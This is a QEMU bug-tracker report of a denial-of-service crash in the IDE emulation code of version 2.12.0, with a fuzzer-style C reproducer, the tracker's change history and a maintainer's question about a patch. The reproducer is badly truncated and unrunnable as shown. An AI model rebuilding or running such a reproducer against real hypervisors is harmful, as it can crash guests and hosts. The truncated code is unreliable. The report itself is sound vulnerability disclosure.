IDE short PRDT abort
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
QEMU |
Expired
|
Undecided
|
Unassigned |
Bug Description
Hi,
QEMU 'hw/ide/core.c:871' Denial of Service Vulnerability in version qemu-2.12.0
run the program in qemu-2.12.0:
#define _GNU_SOURCE
#include <endian.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <stdint.h>
#include <string.h>
static uintptr_t syz_open_
{
if (a0 == 0xc || a0 == 0xb) {
} else {
strncpy(buf, (char*)a0, sizeof(buf) - 1);
}
}
}
uint64_t r[2] = {0xffffffffffff
void loop()
{
long res = 0;
memcpy(
res = syz_open_
if (res != -1)
res = syscall(__NR_dup2, r[0], r[0]);
if (res != -1)
*(uint8_
*(uint8_
*(uint8_
*(uint8_
*(uint32_
*(uint8_
*(uint8_
*(uint8_
*(uint8_
memcpy(
}
int main()
{
loop();
return 0;
}
this will crash qemu, output information:
qemu-system-
Thanks
owl337
Changed in qemu: | |
assignee: | nobody → icytxw (icytxw) |
information type: | Public → Private |
information type: | Private → Private Security |
information type: | Private Security → Public Security |
Changed in qemu: | |
assignee: | nobody → John Snow (jnsnow) |
status: | New → In Progress |
summary: |
- Denial of service + IDE short PRDT abort |
Are you going to provide a patch for this to the mailing list? (since you've assigned the bug to yourself)